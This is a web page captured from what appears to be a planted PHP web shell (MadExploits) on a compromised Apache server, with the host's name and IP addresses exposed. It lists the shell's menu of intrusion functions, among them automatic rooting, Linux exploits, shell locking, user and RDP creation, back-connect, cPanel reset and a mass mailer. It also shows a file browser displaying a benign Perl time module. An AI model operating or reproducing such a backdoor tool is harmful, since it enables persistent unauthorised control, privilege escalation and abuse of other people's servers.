Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.143.237.140
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Time /
[ HOME SHELL ]
Name
Size
Permission
Action
gmtime.pm
2.47
KB
-rw-r--r--
localtime.pm
2.29
KB
-rw-r--r--
tm.pm
691
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tm.pm
package Time::tm; use strict; our $VERSION = '1.00'; use Class::Struct qw(struct); struct('Time::tm' => [ map { $_ => '$' } qw{ sec min hour mday mon year wday yday isdst } ]); 1; __END__ =head1 NAME Time::tm - internal object used by Time::gmtime and Time::localtime =head1 SYNOPSIS Don't use this module directly. =head1 DESCRIPTION This module is used internally as a base class by Time::localtime And Time::gmtime functions. It creates a Time::tm struct object which is addressable just like's C's tm structure from F<time.h>; namely with sec, min, hour, mday, mon, year, wday, yday, and isdst. This class is an internal interface only. =head1 AUTHOR Tom Christiansen
Close